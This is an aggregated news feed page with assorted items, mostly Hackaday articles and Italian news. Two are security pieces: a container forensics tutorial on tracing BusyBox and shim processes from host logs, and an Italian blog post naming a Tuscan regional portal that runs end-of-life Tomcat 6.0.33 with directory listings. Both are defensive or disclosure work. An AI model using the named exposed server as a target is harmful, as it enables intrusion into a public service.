Salta al contenuto principale



Nuovo patto tra sicurezza e crescita economica. Patalano (Kcl) spiega la difesa secondo il Labour

@Notizie dall'Italia e dal mondo

La Strategic Defence Review pubblicata ieri dal governo britannico con un evento a Glasgow alla presenza del primo ministro Sir Keir Starmer e del segretario John Healey racconta le sfide e la strategia britannica in un mondo che, si legge, è segnato da una crescente



Referendum, Corrado (PD) contro Meloni: “Ma che razza di risposta è?”


@Politica interna, europea e internazionale
“Ma che razza di risposta è?”: con queste parole Annalisa Corrado, europarlamente del Partito Democratico, ha criticato la presa di posizione della Presidente del Consiglio Giorgia Meloni che ieri, in occasione della festa della Repubblica, ha dichiarato in vista dell’appuntamento alle urne dell’8 e



Supercon 2024: How To Track Down Radio Transmissions


You turn the dial on your radio, and hear a powerful source of interference crackle in over the baseline noise. You’re interested as to where it might be coming from. You’re receiving it well, and the signal strength is strong, but is that because it’s close or just particularly powerful? What could it be? How would you even go about tracking it down?

When it comes to hunting down radio transmissions, Justin McAllister and Nick Foster have a great deal of experience in this regard. They came down to the 2024 Hackaday Superconference to show us how it’s done.

Transmissions From Where?


youtube.com/embed/3vLtIsfRu_o?…

Nick Foster opens the talk by discussing how the first job is often to figure out what you’re seeing when you pick up a radio transmission. “The moral of this talk is that your hardware is always lying to you,” says Nick. “In this talk, we’re going to show you how your radio lies to you, what you can do about it, and if your hardware is not lying to you, what is that real station that you’re looking at?” It can be difficult to tease out the truth of what the radio might seem to be picking up. “How do we determine what a signal actually is?” he asks. “Is it a real signal that we’re looking at which is being transmitted deliberately from somebody else, or is it interference from a bad power supply, or is it a birdie—a signal that’s created entirely within my own radio that doesn’t exist at all?”

There are common tools used to perform this work of identifying just what the radio is actually picking up and where it’s coming from. Justin goes over some of the typical hardware, noting that the RX-888 is a popular choice for software-defined radio that can be tuned across HF, VHF, and UHF bands. It’s highly flexible, and it’s affordable to boot, as is the Web-888 which can be accessed conveniently over a web browser. Other common SDRs are useful, too, as are a variety of filters that can aid with more precise investigations.
Justin demonstrates an errant radio emission from the brushed motor in his furnace, noting how it varies in bandwidth—a surefire tell versus intentional radio transmissions.
Establishing a grounding in reality is key, Justin steps up to explain. “We turn our SDR on, we stick [on] the little antenna that comes with it, and we start looking at something,” says Justin. “Are the signals that we see there actually real?” He notes that there are some basics to consider right off the bat. “One key point to make is that nobody makes money or has good communication using an unmodulated carrier,” he points out. “If you just see a tone somewhere, it might be real, but there’s a good chance that it’s not.”

It’s perhaps more likely unintentional radiation, noise, or something generated inside the hardware itself on your end. It’s also worth looking at whether you’re looking at a fixed frequency or a changing frequency to pin things down further. Gesturing to a spectrogram, he notes that the long, persistent lines on the spectrogram are usually clues to more intentional transmissions. Intermittent squiggles are more often unintentional. Justin points at some that he puts down to the emissions from arc welders, sparking away as they do, and gives an example of what emissions from typical switching power supplies look like.

There are other hints to look out for, too. Real human-made signals tend to have some logic to them. Justin notes that real signals usually make “efficient” use of spectrum without big gaps or pointless repetition. It’s also possible to make judgement calls as to whether a given signal makes sense for the band it appears to be transmitted in. Schedule can be a tell, too—if a signal always pops up when your neighbor gets home at 6 PM, it might just be coming from their garage door remote. Justin notes a useful technique for hunting down possible nearby emitters—”Flipping on and off switches is a real good way of figuring out—is it close to me or not?”
SDRs are hugely flexible, but they also have very open front-ends that can lead to some confusing output.
Nick follows up by discussing the tendency of sampling radios to show up unique bizarre transmissions that aren’t apparent on an analog receiver. “One of the curses of the RTL-SDR is actually one of its strengths… it has a completely wide open front end,” notes Nick. “Its ADC which is sampling and capturing the RF has basically nothing except an amplifier in between it and whatever crud you’re putting into it.” This provides great sensitivity and frequency agility, but there’s a catch—”It will happily eat up and spit out lots of horrible stuff,” says Nick. He goes on to explain various ways such an SDR might lie to the user. A single signal might start popping up all over the frequency band, or interfere with other signals coming in from the antenna. He also highlights a great sanity check for hunting down birdies—”If it’s always there, if it’s unchanging, if you unplug your antenna and you still hear it—it’s probably generated in your radio!”

The rest of the talk covers locating transmissions—are they in your house, in the local community, or from even farther afield? It explores the technique of multilateration, where synchronized receivers and maths are used to measure the time differences seen in the signal at each point to determine exactly where a transmission is coming from. The talk also goes over common sources of noise in residential settings—cheap PWM LED lights, or knock-off laptop chargers being a prime example in Nick’s experience. There’s also a discussion of how the noise floor has shifted up a long way compared to 50 years ago, now that the world is full of so many more noise-emitting appliances.

Ultimately, the duo of Justin and Nick brought us a great pun-filled talk on sleuthing for the true source of radio transmissions. If you’ve ever wondered about how to track down some mystery transmitter, you would do well to watch and learn from the techniques explored within!


hackaday.com/2025/06/03/superc…




Simulation and Motion Planning for 6DOF Robotic Arm


ManiPylator focusing its laser pointer at a page.

[Leo Goldstien] recently got in touch to let us know about a fascinating update he posted on the Hackaday.io page for ManiPylator — his 3D printed Six degrees of freedom, or 6DOF robotic arm.

This latest installment gives us a glimpse at what’s involved for command and control of such a device, as what goes into simulation and testing. Much of the requisite mathematics is introduced, along with a long list of links to further reading. The whole solution is based entirely on free and open source (FOSS) software, in fact a giant stack of such software including planning and simulation software on top of glue like MQTT message queues.

The practical exercise for this installment was to have the arm trace out the shape of a heart, given as a mathematical equation expressed in Python code, and it fared quite well. Measurements were taken! Science was done!

We last brought you word about this project in October of 2024. Since then, the project name has changed from “ManiPilator” to “ManiPylator”. Originally the name was a reference to the Raspberry Pi, but now the focus is on the Python programming language. But all the bot’s best friends just call him “Manny”.

If you want to get started with your own 6DOF robotic arm, [Leo] has traced out a path for you to follow. We’d love to hear about what you come up with!

youtube.com/embed/as9t7umI3mM?…


hackaday.com/2025/06/03/simula…



Don’t empower agencies to gut free speech


Federal agencies are transforming into the speech police under President Donald Trump. So why are some Democrats supporting the Kids Online Safety Act, a recently reintroduced bill that would authorize the MAGA-controlled Federal Trade Commission to enforce censorship?

As Freedom of the Press Foundation (FPF) senior advocacy adviser Caitlin Vogus wrote for The Boston Globe, there’s never an excuse for supporting censorship bills, but especially when political loyalists are at the FTC sure to abuse any power they’re given to stifle news on disfavored topics.

Vogus wrote, “KOSA’s supporters argue that it’s about keeping children under 17 safe from the harms of social media. But at the heart of the bill is something everyone should oppose: empowering the government to decide what speech children should be forbidden from seeing online.”

Read the article here.


freedom.press/issues/dont-empo…



Aggiornamenti Android giugno 2025, corrette 36 vulnerabilità: aggiorniamo i dispositivi


@Informatica (Italy e non Italy 😁)
Google ha rilasciato l’Android Security Bulletin per il mese di giugno 2025, con gli aggiornamenti per 36 vulnerabilità: la più grave, identificata nel componente System, potrebbe causare un'escalation locale dei privilegi senza alcuna



Rai diretta streaming estero: guida alla visione dei programmi Tv


@Informatica (Italy e non Italy 😁)
Per guardare la diretta streaming della Rai dall'estero è consigliato l'uso di una VPN (Virtual Private Network). Le VPN permettono di cambiare il proprio indirizzo IP, simulando una connessione dall'Italia, il che consente di aggirare i blocchi imposti dalle restrizioni



Il codice e l’etica. L’intelligenza che cambia il mondo

L'articolo proviene da #Euractiv Italia ed è stato ricondiviso sulla comunità Lemmy @Intelligenza Artificiale
Il 13 giugno l’Avv. Federica De Stefani condurrà a Mantova il convegno “Il codice e l’etica. L’intelligenza che cambia il mondo”, evento conclusivo del secondo anno del Percorso di Eccellenza dell’Università degli

Intelligenza Artificiale reshared this.



Anti-porn laws can't stop porn, but they can stop free speech. In the meantime, people will continue to get off to anything and everything.

Anti-porn laws canx27;t stop porn, but they can stop free speech. In the meantime, people will continue to get off to anything and everything.#porn #sex

#sex #x27 #porn



Add Wood Grain Texture to 3D Prints – With a Model of a Log


Adding textures is a great way to experiment with giving 3D prints a different look, and [PandaN] shows off a method of adding a wood grain effect in a way that’s easy to play around with. It involves using a 3D model of a log (complete with concentric tree rings) as a print modifier. The good news is that [PandaN] has already done the work of creating one, as well as showing how to use it.
The model of the stump — complete with concentric tree rings — acts as a modifier for the much-smaller printed object (in this case, a small plate).
In the slicer software one simply uses the log as a modifier for an object to be printed. When a 3D model is used as a modifier in this way, it means different print settings get applied everywhere the object to be printed and the modifier intersect one another.

In the case of this project, the modifier shifts the angle of the fill pattern wherever the models intersect. A fuzzy skin modifier is used as well, and the result is enough to give a wood grain appearance to the printed object. When printed with a wood filament (which is PLA mixed with wood particles), the result looks especially good.

We’ve seen a few different ways to add textures to 3D prints, including using Blender to modify model surfaces. Textures can enhance the look of a model, and are also a good way to hide layer lines.

In addition to the 3D models, [PandaN] provides a ready-to-go project for Bambu slicer with all the necessary settings already configured, so experimenting can be as simple as swapping the object to be printed with a new 3D model. Want to see that in action? Here’s a separate video demonstrating exactly that step-by-step, embedded below.

youtube.com/embed/dPqu9Sk01jc?…


hackaday.com/2025/06/03/add-wo…



Obsolescenza Tecnologica. Accesso Sicuro della Regione Toscana su server obsoleto da 9 anni


L’Obsolescenza tecnologia è una brutta bestia!

Ti ritrovi con dispositivi e applicazioni perfettamente funzionanti, ma ormai inutilizzabili perché i sistemi non sono più supportati, le app smettono di aggiornarsi e le patch di sicurezza diventano un miraggio. Non si tratta solo di un fastidio pratico: è anche un rischio concreto, soprattutto in ambito informatico. Tecnologie obsolete diventano il bersaglio preferito dei cyber attacchi, rendendo aziende, enti pubblici e utenti finali estremamente vulnerabili. Restare aggiornati non è più un’opzione: è una necessità.

Certo, non è affatto semplice affrontare un replatforming, cioè la migrazione di applicazioni e sistemi verso nuove piattaforme quando cambiano le major release dei prodotti. Questo processo può richiedere risorse, competenze e tempo. Tuttavia, prevedere questi ammodernamenti nel ciclo di vita del software è una responsabilità imprescindibile. Ignorarli significa accumulare debito tecnologico e mettere a rischio l’intero ecosistema digitale su cui si basa l’organizzazione.

Il Portale Accesso Sicuro della Regione Toscana


Il sito accessosicuro.rete.toscana.it/… è il portale ufficiale della Regione Toscana per l’accesso ai servizi online ad autenticazione sicura. Attraverso questo portale, cittadini, professionisti e operatori possono svolgere varie pratiche amministrative e sanitarie da remoto, in modo protetto e conforme alle normative vigenti.

A parte dei Directory Listing presenti all’interno del sito, la cosa che ci è stata portata all’attenzione da N3m0D4m è la versione del server Apache Tomcat presente in esercizio. Si parla della versione 6.0.33 che è andata in de supporto il 31 dicembre 2016.

Quindi stiamo parlando di un server che non riceve più patch di sicurezza da ben 9 anni.
Pagina di errore sul portale rete.toscana.it che mostra la presenza di un application server obsoleto

Cos’è l’obsolescenza tecnologica


L’obsolescenza tecnologica si verifica quando un sistema, un dispositivo o un software diventa inadeguato non perché smetta di funzionare, ma perché non riceve più supporto tecnico o aggiornamenti di sicurezza da parte del produttore.

Nel contesto della sicurezza informatica, questo è un problema altamente critico. Quando un sistema non viene più aggiornato, le vulnerabilità scoperte nel tempo restano aperte. Ogni bug o falla non corretta rappresenta una porta lasciata socchiusa che un attaccante può facilmente sfruttare. E quando si tratta di una applicazione esposta su internet, i rischi diventano molto ma molto più importanti.

Cosa succede esattamente?


  • Nessuna patch di sicurezza: i cyber criminali cercano attivamente sistemi non aggiornati, perché sanno esattamente come colpirli.
  • Espansione del rischio nel tempo: più tempo passa dall’ultimo aggiornamento, maggiore sarà il numero di vulnerabilità pubblicamente note che colpiscono quel sistema.
  • Incompatibilità con nuove tecnologie di difesa: software EDR/XDR, antivirus, firewall o sistemi di monitoraggio moderni non sempre funzionano su tecnologie obsolete, lasciando interi ambienti scoperti.
  • Utilizzo in attacchi a catena: un sistema vulnerabile può essere il punto d’ingresso per compromettere tutta una rete aziendale o istituzionale, anche se il server non eroga alcun servizio.


Un problema per tutti


Questo non è un rischio teorico: le cronache sono piene di casi in cui un semplice componente obsoleto ha permesso a un attaccante di prendere il controllo di interi sistemi. Nella pubblica amministrazione, dove spesso convivono tecnologie datate e dati sensibili, l’obsolescenza è una vera e propria bomba a orologeria.

E non si tratta solo di malware o ransomware: le falle non corrette possono permettere furti di dati personali, accessi non autorizzati, modifiche ai contenuti e molto altro.

Come affrontare l’obsolescenza tecnologica


Affrontare l’obsolescenza tecnologica richiede una visione strategica e un approccio proattivo.

Non basta reagire quando un sistema smette di funzionare o non riceve più aggiornamenti: è fondamentale pianificare in anticipo il ciclo di vita delle tecnologie utilizzate. Questo significa monitorare le date di fine supporto (EoL – End of Life) dei software e dei sistemi critici, stabilire una roadmap per gli aggiornamenti e prevedere risorse per interventi di manutenzione evolutiva. Ogni organizzazione dovrebbe adottare un inventario IT aggiornato, con indicatori chiari sullo stato e sulla criticità dei vari componenti, per prevenire l’accumulo di debito tecnologico.

La chiave è l’ammodernamento continuo, non l’intervento d’emergenza.

Quando possibile, è utile adottare soluzioni modulari e scalabili, che facilitino futuri aggiornamenti senza dover ricostruire da zero l’intera infrastruttura. Inoltre, il replatforming – per quanto complesso – deve essere considerato parte integrante della manutenzione a lungo termine. È importante coinvolgere team tecnici, responsabili della sicurezza e decisori strategici in un dialogo costante per valutare impatti, costi e benefici. Solo così è possibile garantire continuità operativa, sicurezza e sostenibilità nel tempo.

Concludendo


L’obsolescenza tecnologica non è solo una questione di efficienza o modernizzazione: è una questione di sicurezza. Continuare a utilizzare software o infrastrutture non più supportate equivale, nel mondo digitale, a lasciare la porta di casa aperta in un quartiere ad alto rischio.

Nel contesto attuale, dove gli attacchi informatici crescono in complessità e frequenza, ignorare gli aggiornamenti significa esporsi volontariamente al pericolo. E il prezzo da pagare non è solo tecnico: può tradursi in danni reputazionali, sanzioni per mancato rispetto delle normative (come il GDPR), perdita di dati sensibili e costi di ripristino elevati.

Aggiornare non è più una scelta, è un dovere di responsabilità digitale — sia per i privati, sia (e soprattutto) per le istituzioni pubbliche che gestiscono servizi essenziali per i cittadini.

La tecnologia evolve, ma la sicurezza non può restare indietro.

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione dell’organizzazione qualora voglia darci degli aggiornamenti su questa vicenda e saremo lieti di pubblicarla con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono accedere utilizzare la mail crittografata del whistleblower.

L'articolo Obsolescenza Tecnologica. Accesso Sicuro della Regione Toscana su server obsoleto da 9 anni proviene da il blog della sicurezza informatica.



My Winter of ’99: The Year of the Linux Desktop is Always Next Year


Growing up as a kid in the 1990s was an almost magical time. We had the best game consoles, increasingly faster computers at a pace not seen before, the rise of the Internet and World Wide Web, as well the best fashion and styles possible between neon and pastel colors, translucent plastic and also this little thing called Windows 95 that’d take the world by storm.

Yet as great as Windows 95 and its successor Windows 98 were, you had to be one of the lucky folks who ended up with a stable Windows 9x installation. The prebuilt (Daewoo) Intel Celeron 400 rig with 64 MB SDRAM that I had splurged on with money earned from summer jobs was not one of those lucky systems, resulting in regular Windows reinstalls.

As a relatively nerdy individual, I was aware of this little community-built operating system called ‘Linux’, with the online forums and the Dutch PC magazine that I read convincing me that it would be a superior alternative to this unstable ‘M$’ Windows 98 SE mess that I was dealing with. Thus it was in the Year of the Linux Desktop (1999) that I went into a computer store and bought a boxed disc set of SuSE 6.3 with included manual.

Fast-forward to 2025, and Windows is installed on all my primary desktop systems, raising the question of what went wrong in ’99. Wasn’t Linux the future of desktop operating systems?

Focus Groups

Boxed SuSE Linux 6.3 software. (Source: Archive.org)Boxed SuSE Linux 6.3 software. (Source: Archive.org)
Generally when companies gear up to produce something new, they will determine and investigate the target market, to make sure that the product is well-received. This way, when the customer purchases the item, it should meet their expectations and be easy to use for them.

This is where SuSE Linux 6.3 was an interesting experience for me. I’d definitely have classified myself in 1999 as your typical computer nerd who was all about the Pentiums and the MHz, so at the very least I should have had some overlap with the nerds who wrote this Linux OS thing.

The comforting marketing blurbs on the box promised an easy installation, bundled applications for everything, while suggesting that office and home users alike would be more than happy to use this operating system. Despite the warnings and notes in the installation section of the included manual, installation was fairly painless, with YAST (Yet Another Setup Tool) handling a lot of the tedium.

However, after logging into the new operating system and prodding and poking at it a bit over the course of a few days, reality began to set in. There was the rather rough-looking graphical interface, with what I am pretty sure was the FVWM window manager for XFree86, no font aliasing and very crude widgets. I would try the IceWM window manager and a few others as well, but to say that I felt disappointed was an understatement. Although it generally worked, the whole experience felt unfinished and much closer to using CDE on Solaris than the relatively Windows 98 or the BeOS Personal Edition 5 that I would be playing with around that time as well.

That’s when a friend of my older brother slipped me a completely legit copy of Windows 2000 plus license key. To my pleasant surprise, Windows 2000 ran smoothly, worked great and was stable as a rock even on my old Celeron 400 rig that Windows 98 SE had struggled with. I had found my new forever home, or so I thought.

Focus Shift

Start-up screen of FreeSCO. (Credit: Lewis “Lightning” Baughman, Wikimedia)Start-up screen of FreeSCO. (Credit: Lewis “Lightning” Baughman, Wikimedia)
With Windows 2000, and later XP, being my primary desktop systems, my focus with Linux would shift away from the desktop experience and more towards other applications, such as the FreeSCO (en français) single-floppy router project, and the similar Smoothwall project. After upgrading to a self-built AMD Duron 600 rig, I’d use the Celeron 400 system to install various Linux distributions on, to keep tinkering with them. This led me down the path of trying out Wine to try out Windows applications on Linux in the 2000s, along with some Windows games ported by Loki Entertainment, with mostly disappointing results. This also got me to compile kernel modules, to make the onboard sound work in Linux.

Over the subsequent years, my hobbies and professional career would take me down into the bowels of Linux and similar with mostly embedded (Yocto) development, so that by now I’m more familiar with Linux from the perspective of the command line and architectural level. Although I have many Linux installations kicking around with a perfectly fine X/Wayland installation on both real hardware and in virtual machines, generally the first thing I do after logging in is pop open a Bash terminal or two or switching to a different TTY.

Yet now that the rainbows-and-sunshine era of Windows 2000 through Windows 7 has come to a fiery end amidst the dystopian landscape of Windows 10 and with Windows 11 looming over the horizon, it’s time to ask whether I would make the jump to the Linux desktop now.

Linux Non-Standard Base


Bringing things back to the ‘focus group’ aspect, perhaps one of the most off-putting elements of the Linux ecosystem is the completely bewildering explosion of distributions, desktop environments, window managers, package managers and ways of handling even basic tasks. All the skills that you learned while using Arch Linux or SuSE/Red Hat can be mostly tossed out the moment you are on a Debian system, never mind something like Alpine Linux. The differences can be as profound as when using Haiku, for instance.

Rather than Linux distributions focusing on a specific group of users, they seem to be primarily about doing what the people in charge want. This is illustrated by the demise of the Linux Standard Base (LSB) project, which was set up in 2001 by large Linux distributions in order to standardize various fundamentals between these distributions. The goals included a standard filesystem hierarchy, the use of the RPM package format and binary compatibility between distributions to help third-party developers.

By 2015 the project was effectively abandoned, and since then distributing software across Linux distributions has become if possible even more convoluted, with controversial ‘solutions’ like Canonical’s Snap, Flatpak, AppImage, Nix and others cluttering the landscape and sending developers scurrying back in a panic to compiling from source like it’s the 90s all over again.

Within an embedded development context this lack of standardization is also very noticeable, between differences in default compiler search paths, broken backwards compatibility — like the removal of ifconfig — and a host of minor and larger frustrations even before hitting big ticket items like service management flittering between SysV, Upstart, Systemd or having invented their own, even if possibly superior, alternatives like OpenRC in Alpine Linux.

Of note here is also that these system service managers generally do not work well with GUI-based applications, as CLI Linux and GUI Linux are still effectively two entirely different universes.

Wrong Security Model


For some inconceivable reason, Linux – despite not having UNIX roots like BSD – has opted to adopt the UNIX filesystem hierarchy and security model. While this is of no concern when you look at Linux as a wannabe-UNIX that will happily do the same multi-user server tasks, it’s an absolutely awful choice for a desktop OS. Without knowledge of the permission levels on folders, basic things like SSH keys will not work, and accessing network interfaces with Wireshark requires root-level access and some parts of the filesystem, like devices, require the user to be in a specific group.

When the expectation of a user is that the OS behaves pretty much like Windows, then the continued fight against an overly restrictive security model is just one more item that is not necessarily a deal breaker, but definitely grates every time that you run into it. Having the user experience streamlined into a desktop-friendly experience would help a lot here.

Unstable Interfaces


Another really annoying thing with Linux is that there is no stable kernel driver API. This means that with every update to the kernel, each of the kernel drivers have to be recompiled to work. This tripped me up in the past with Realtek chipset drivers for WiFi and Bluetooth. Since these were too new to be included in the Realtek driver package, I had to find an online source version on GitHub, run through the whole string of commands to compile the kernel driver and finally load it.

After running a system update a few days later and doing a restart, the system was no longer to be found on the LAN. This was because the WiFi driver could no longer be loaded, so I had to plug in Ethernet to regain remote access. With this experience in mind I switched to using Wireless-N WiFi dongles, as these are directly supported.

Experiences like this fortunately happen on non-primary systems, where a momentary glitch is of no real concern, especially since I made backups of configurations and such.

Convoluted Mess


This, in a nutshell, is why moving to Linux is something that I’m not seriously considering. Although I would be perfectly capable of using Linux as my desktop OS, I’m much happier on Windows — if you ignore Windows 11. I’d feel more at home on FreeBSD as well as it is a far more coherent experience, not to mention BeOS’ successor Haiku which is becoming tantalizingly usable.

Secretly my favorite operating system to switch to after Windows 10 would be ReactOS, however. It would bring the best of Windows 2000 through Windows 7, be open-source like Linux, yet completely standardized and consistent, and come with all the creature comforts that one would expect from a desktop user experience.

One definitely can dream.


hackaday.com/2025/06/03/my-win…



Host-based logs, container-based threats: How to tell where an attack began



The risks associated with containerized environments


Although containers provide an isolated runtime environment for applications, this isolation is often overestimated. While containers encapsulate dependencies and ensure consistency, the fact that they share the host system’s kernel introduces security risks.

Based on our experience providing Compromise Assessment, SOC Consulting, and Incident Response services to our customers, we have repeatedly seen issues related to a lack of container visibility. Many organizations focus on monitoring containerized environments for operational health rather than security threats. Some lack the expertise to properly configure logging, while others rely on technology stacks that don’t support effective visibility of running containers.

Environments that suffer from such visibility issues are often challenging for threat hunters and incident responders because it can be difficult to clearly distinguish between processes running inside a container and those executed on the host itself. This ambiguity makes it difficult to determine the true origin of an attack and whether it started in a compromised container or directly on the host.

The aim of this blog post is to explain how to restore the execution chain inside a running container using only host-based execution logs, helping threat hunters and incident responders determine the root cause of a compromise.

How containers are created and operate


To effectively investigate security incidents and hunt for threats in containerized environments, it’s essential to understand how containers are created and how they operate. Unlike virtual machines, which run as separate operating systems, containers are isolated user-space environments that share the host OS kernel. They rely on namespaces, control groups (cgroups), union filesystems, Linux capabilities, and other Linux features for resource management and isolation.

Because of this architecture, every process inside a container technically runs on the host, but within a separate namespace. Threat hunters and incident responders typically rely on host-based execution logs to gain a retrospective view of executed processes and command-line arguments. This allows them to analyze networks that lack dedicated containerization environment monitoring solutions. However, some logging configurations may lack critical attributes such as namespaces, cgroups, or specific syscalls. In such cases, rather than relying solely on missing log attributes, we can bridge this visibility gap by understanding the process execution chain of a running container from a host perspective.

Overview of the container creation workflow
Overview of the container creation workflow

End users interact with command-line utilities, such as Docker CLI, kubectl and others, to create and manage their containers. On the backend, these utilities communicate with an engine that facilitates communication with a high-level container runtime, most commonly containerd or CRI-O. These high-level container runtimes leverage low-level container runtimes like runc (the most common) to do the heavy lifting of interacting with the Linux OS kernel. This interaction allocates cgroups, namespaces, and other Linux capabilities for creating and killing containers based on a bundle provided by the high-level runtime. The high-level runtime is, in its turn, based on user-provided arguments. The bundle is a self-contained directory that defines the configuration of a container according to the Open Container Initiative (OCI) Runtime Specification. It mainly consists of:

  1. A rootfs directory that serves as the root filesystem for the container. It is created by extracting and combining the layers from a container image, typically using a union filesystem like OverlayFS.
  2. A config.json file describing an OCI runtime configuration that specifies the necessary process, mounts, and other configurations necessary for creating the container.

It’s important to note which mode runc has been executed in, since it supports two modes: foreground mode and detached mode. The resulting process tree may vary depending on the chosen mode. In foreground mode, a long-running runc process remains in the foreground as a parent process for the container process, primarily to handle the stdio so the end user can interact with the running container.

Process tree of a container created in foreground mode using runc
Process tree of a container created in foreground mode using runc

In detached mode, however, there will be no long-running runc process. After creating the container, runc exits, leaving the caller process to take care of the stdio. In most cases, this is containerd or CRI-O. As we can see in the screenshot below, when we execute a detached container using runc, the runc process will create it and immediately exit. Hence, the parent process of the container is the host’s PID 1 (systemd process).

Process tree of a container created in detached mode using runc
Process tree of a container created in detached mode using runc

However, if we create a detached container using Docker CLI, for example, we’ll notice that the parent of the container process is a shim process, not PID 1!

Process tree of a container created in detached mode using Docker CLI
Process tree of a container created in detached mode using Docker CLI

In modern architectures, communication between high- and low-level container runtimes is proxied through a shim process. This allows containers to run independently of the high-level container runtime, ensuring the sustainability of the running container even if the high-level container runtime crashes or restarts. The shim process also manages the stdio of the container process so users can later attach to running containers via commands like docker exec -it <container>, for example. The shim process can also redirect stdout and stderr to log files that users can later inspect either directly from the filesystem or via commands like kubectl logs <pod> -c <container>.

When a detached container is created using Docker CLI, the high-level container runtime, for example, containerd, executes a shim process that calls runc as a low-level container runtime for the sole purpose of creating the container in detached mode. After that, runc immediately exits. To avoid orphan processes or reparenting to the PID 1, as in the case when we executed runc ourselves, the shim process explicitly sets itself as a subreaper to adopt the container processes after runc exits. A Linux subreaper process is a designated parent that takes care of orphaned child processes in its chain (instead of init), allowing it to manage and clean up its entire process tree.

Detached containers will be reparented to the shim process after creation
Detached containers will be reparented to the shim process after creation

This is implemented in the latest V2 shim and is the default in the modern containerd implementations.

The shim process sets itself as a subreaper process during creation
The shim process sets itself as a subreaper process during creation

When we check the help message of the containerd-shim-runc-v2 process, for example, we notice that it accepts the container ID as a command-line argument, and calls it the id of the task.

Help message of the shim process
Help message of the shim process

We can confirm this by checking the command-line arguments of the running containerd-shim-runc-v2 processes and comparing them with the running containers.

The shim process accepts the ID of the relevant container as a command-line argument
The shim process accepts the ID of the relevant container as a command-line argument

So far, we’ve successfully identified container processes from the host’s perspective. In modern architectures, one of the following processes will typically be seen as a predecessor process for the containerized processes:

  • A shim process, in the case of detached mode; or
  • A runc process, in the case of foreground (interactive) mode.

We can also use the command-line arguments of the shim process to determine which container the process belongs to.

Process tree of the containers from the host perspective
Process tree of the containers from the host perspective

Although tracking the child processes of the shim process can sometimes lead to easy wins, it is often not as easy as it sounds, especially when there are a lot of subprocesses between the shim process and the malicious process. In this case, we can take a bottom-to-top approach, pivoting from the malicious process, tracking its parents all the way up to the shim process to confirm that it was executed inside a running container. It then becomes a matter of choosing the process whose behavior we may need to check for malicious or suspicious activities.

Since containers typically run with minimal dependencies, attackers often rely on shell access to either execute commands directly, or install missing dependencies for their malware. This makes container shells a critical focus for detection. But how exactly do these shells behave? Let’s take a closer look at one of the key shell processes in containerized environments.

How do BusyBox and Alpine execute commands?


In this post, we focus on the behavior of BusyBox-based containers. We also included Alpine-based containers as an example of an image base that relies on BusyBox to implement many core Linux utilities, helping to keep the image lightweight. For the sake of demonstration, Alpine images that depend on other utilities are outside the scope of this post.

BusyBox provides minimalist replacements for many commonly used UNIX utilities, combining them into one small executable. This allows for the creation of lightweight containers with significantly reduced image sizes. But how does the BusyBox executable actually work?

BusyBox has its own implementation of system utilities, known as applets. Each applet is written in C and stored in the busybox/coreutils/ directory as part of the source code. For example, the UNIX cat utility has a custom implementation named cat.c. At runtime, BusyBox creates an applet table that maps applet names to their corresponding functions. This table is used to determine which applet to execute based on the command-line argument provided. This mechanism is defined in the appletlib.c file.

Snippet of the appletlib.c file
Snippet of the appletlib.c file

When an executed command calls an installed utility that is not a default applet, BusyBox relies on the PATH environment variable to determine the utility’s location. Once the path is identified, BusyBox spawns the utility as a child process of the BusyBox process itself. This dynamic execution mechanism is critical to understanding how command execution works within a BusyBox-based container.

Applet/program execution logic
Applet/program execution logic

Now that we have a clear understanding of how the BusyBox binary operates, let’s explore how it functions when running inside a container. What happens, for example, when you execute the sh command inside such containers?

In both BusyBox and Alpine containers, executing the sh command to access the shell doesn’t actually invoke a standalone binary called sh. Instead, the BusyBox binary itself is executed. In BusyBox containers we can verify that /bin/sh is replaced by BusyBox by comparing the inodes of /bin/sh and /bin/busybox using ls -li and confirm that both have the same inode number. We can also print their MD5 hash to see that they are the same, and by executing /bin/sh --help, we’ll see that the banner of BusyBox is the one that’s printed.

/bin/sh is replaced by the /bin/busybox on the BusyBox based containers
/bin/sh is replaced by the /bin/busybox on the BusyBox based containers

On the other hand, in the Alpine containers, /bin/sh is a symbolic link to /bin/busybox. This means that when you run the sh command, it actually executes the BusyBox executable referred to by the symbolic link. This can be confirmed by executing readlink -f /bin/sh and observing the output.

/bin/sh is a symbolic link to /bin/busybox in the Alpine-based containers
/bin/sh is a symbolic link to /bin/busybox in the Alpine-based containers

Hence, inside BusyBox- or Alpine-based containers, all shell commands are either executed directly by the BusyBox process or are launched as child processes under the BusyBox process. These processes run within isolated namespaces on the host operating system, providing the necessary containerization while still utilizing the shared kernel of the host.

From a threat hunting perspective, having a non-standard shell process for the host OS, like BusyBox in this case, should prompt further investigation. Why would a BusyBox shell process be running on a Debian or a RedHat OS? Combining this conclusion with the previous one allows us to confirm that the shell was executed inside a container when runc or shim is observed as the predecessor process to the BusyBox process. This knowledge can be applied not only to the BusyBox process but also to any other process executed inside a running container. This knowledge is crucial for effectively determining the origin of suspicious behavior while hunting for threats using the host execution logs.

Some security tools, such as Kaspersky Container Security, are designed to monitor container activity and detect suspicious behavior. Others, such as Auditd, provide enriched logging at the kernel level based on preconfigured rules that capture system calls, file access, and user activity. However, these rules are often not optimized for containerized environments, further complicating the distinction between host and container activity.

Investigation value


While investigating execution logs, threat hunters and incident responders might overlook some activities on Linux machines, thinking they are part of normal operations. However, the same activities performed inside a running container should raise suspicion. For example, installing utilities such as Docker CLI may be normal on the host, but not inside a container. Recently, in a Compromise Assessment project, we discovered a crypto mining campaign in which the threat actor installed Docker CLI inside a running container in order to easily communicate with dockerd APIs.

Confirming that the docker.io installation occurred inside a running container
Confirming that the docker.io installation occurred inside a running container

In this example, we detected the installation of Docker CLI inside a container by tracing the process chain. We then determined the origin of the executed command and confirmed the container in which the command was executed by checking the command-line argument of the shim process.

During another investigation, we detected an interesting event where the process name was systemd while the process executable path was /.redtail. To identify the origin of this process, we followed the same procedure of tracking the parent processes.

Determining the container in which the suspicious event occurred
Determining the container in which the suspicious event occurred

Another interesting fact we can leverage is that a Docker container is always created by a runc process as the low-level container runtime. The runc help message reveals the command-line arguments used to create, run or start a container.

runc help messate
runc help messate

Monitoring these events helps threat hunters and incident responders identify the ID of the subject container and detect any abnormal entrypoints. A container’s entrypoint is its main process and it will be the process spawned by runc. The screenshot below shows an example of the creation of a malicious container detected by hunting for entrypoints with suspicious command-line arguments. In this case, the command line contains a malicious base64-encoded command.

Hunting for suspicious container entrypoints
